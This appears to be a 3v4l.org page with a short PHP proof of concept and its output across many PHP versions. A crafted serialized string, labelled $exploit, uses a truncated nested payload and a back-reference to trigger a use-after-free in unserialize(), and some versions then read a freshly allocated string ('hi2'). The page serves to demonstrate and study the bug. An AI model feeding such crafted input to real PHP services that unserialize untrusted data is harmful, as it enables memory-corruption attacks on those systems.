3v4l.org

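<?php

class obj implements Serializable {
    var $data;
    function serialize() {
        return serialize($this->data);
    }
    function unserialize($data) {
        $this->data = unserialize($data);
    }
}

$inner = 'a:2:{i:0;i:1;i:1;i:2'; // 20 bytes, cut short: the nested unserialize() on line 9 fails
$exploit = 'a:2:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}i:1;R:5;}'; // R:5 is a back-reference to an earlier value slot

$data = unserialize($exploit);

for ($i = 0; $i < 5; $i++) { // allocate new strings; on some versions $data[1] then reads one of them ("hi2")
    $v[$i] = 'hi'.$i;
}

var_dump($data);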
based on cW23S
Output for 5.3.18 - 5.3.29, 7.0.20 - 7.2.0
Notice: unserialize(): Error at offset 17 of 20 bytes in /in/gDfuY on line 9
Notice: unserialize(): Error at offset 52 of 53 bytes in /in/gDfuY on line 16
bool(false)
Output for 7.0.0 - 7.0.6
Notice: unserialize(): Error at offset 17 of 20 bytes in /in/gDfuY on line 9
array(1) {
  [0]=>
  object(obj)#1 (1) {
    ["data"]=>
    bool(false)
  }
}
Output for 5.4.45, 5.5.29 - 5.5.35, 5.6.13 - 5.6.28
Notice: unserialize(): Error at offset 17 of 20 bytes in /in/gDfuY on line 9
array(2) {
  [0]=>
  object(obj)#1 (1) {
    ["data"]=>
    bool(false)
  }
  [1]=>
  NULL
}
Output for 5.6.7 - 5.6.12
Notice: unserialize(): Error at offset 17 of 20 bytes in /in/gDfuY on line 9
array(2) {
  [0]=>
  object(obj)#1 (1) {
    ["data"]=>
    bool(false)
  }
  [1]=>
  &UNKNOWN:0
}
Output for 5.4.2 - 5.4.44, 5.5.24 - 5.5.28
Notice: unserialize(): Error at offset 17 of 20 bytes in /in/gDfuY on line 9
array(2) {
  [0]=>
  object(obj)#1 (1) {
    ["data"]=>
    bool(false)
  }
  [1]=>
  string(3) "hi2"
}